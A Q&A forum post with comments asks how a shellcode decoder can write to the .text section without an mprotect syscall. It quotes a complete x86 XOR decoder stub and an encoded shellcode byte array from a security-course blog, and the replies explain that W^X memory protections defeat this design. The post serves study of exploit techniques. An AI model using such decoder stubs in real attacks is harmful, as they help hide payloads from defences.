# How is it even possible to design a shellcode decoder without syscall/sysenter/int 0x80?

Tags: shellcode

I have been studying shellcode decoders and found lots of articles on line about it, e.g.,
https://www.rcesecurity.com/2015/01/slae-custom-rbix-shellcode-encoder-decoder/

All the references I found uses the same design philosophy which I dont think even work. I will use the link above as an example:

```
global _start           

section .text
_start:
    jmp get_shellcode

decoder:
    pop esi         ;pointer to shellcode
    push esi        ;save address of shellcode for later execution
    mov edi, esi    ;copy address of shellcode to edi to work with it

    xor eax, eax    ;clear first XOR-operand register
    xor ebx, ebx    ;clear second XOR-operand register
    xor ecx, ecx    ;clear inner loop-counter
    xor edx, edx    ;clear outer loop-counter

loop0:  
    mov al, [esi]   ;get first byte from the encoded shellcode
    mov bl, [esi+1] ;get second byte from the encoded shellcode
    xor al, bl      ;xor them (result is saved to eax)
    mov [edi], al   ;save (decode) to the same memory location as the encoded shellcode
    inc edi         ;move decoded-pointer 1 byte onward
    inc esi         ;move encoded-pointer 1 byte onward
    inc ecx         ;increment inner loop-counter
    cmp cl, 0x3     ;dealing with 4byte-blocks!
    jne loop0          

    inc esi         ;move encoded-pointer 1 byte onward
    xor ecx, ecx    ;clear inner loop-counter
    add dx, 0x4     ;move outer loop-counter 4 bytes onward
    cmp dx, len     ;check whether the end of the shellcode is reached
    jne loop0

    call [esp]      ;execute decoded shellcode

get_shellcode:
    call decoder
    shellcode: db 0x60,0x0a,0x6c,0x34,0xa6,0xcc,0xcd,0x96,0xf9,0xc8,0x3e,0x68,0xa6,0xf5,0x9f,0x9d,0x37,0xbe,0x5f,0x92,0x5d,0xdd,0x82,0x15,0xe4,0x77,0xc7,0xa1,0xdc,0x8a,0xec,0x84,0xe2,0xe7,0xde,0xb8,0x17,0x44,0xcd,0x2c,0x1d,0x77,0x67,0x36,0x18,0x4f,0xc6,0x27,0x55,0x98,0x18,0xa8,0x52,0x34,0x87,0x83,0xdc,0x8a,0xdd,0x54,0xa5,0x44,0x89,0x09,0xa6,0x16,0x70,0x33,0xe6,0xb0,0xe6,0xb1,0xbf,0x36,0xd7,0x1a,0x5b,0xdb,0x82,0xdb,0xea,0x5b,0x59,0xca,0x23,0x93,0xac,0x61,0x0d,0x8d,0xc4,0xbd,0xed,0x14,0xa4,0xaf,0xe0,0x88,0xa7,0x88,0x25,0x56,0x3e,0x56,0x63,0x4c,0x2e,0x47,0x5c,0x32,0xbb,0x58,0xc3,0x82,0x0b,0xc1,0xff,0x32,0xb2,0x22
    len:    equ $-shellcode
```

Let's ignore the actual decoding algorithm for now. The idea is to place the shellcode in the memory with `db` keyword. This will be assembled and loaded in the `.text` section in the memory. At runtime the decoder reads this memory and manipulate the bytes and **then write back to memory**. Then execute the decoded output by a `call [esp]`.

How is writing back to .text section of the memory possible? We have to call mprotect syscall to enable write permission on text section or execute permission if the shellcode is in the stack or .data section, etc. Going back to my initial question:

Is it even possible to design a shellcode decoder without syscall/sysenter/int 0x80 ?

Comment: @Carcigenicate, if it is the stack (which is not executable), how can we execute it with call [esp] ?

Comment: It doesn't necessarily have to be on the stack - `call [esp]` gets the address to be called from the stack, it could in principle be anywhere in memory.  But this design does require that the shellcode is located in memory that is both writable and executable.  On older systems that might have been true of the stack, and this attack is probably designed for such systems.  On more modern systems, no part of memory is normally both writable and executable, so this design would not work.

Comment: You're correct that it likely won't work as a standalone program because `.text` will not be writable.

Comment: Thank you for the discussion! I am just so surprise that these wrong post are all around the internet.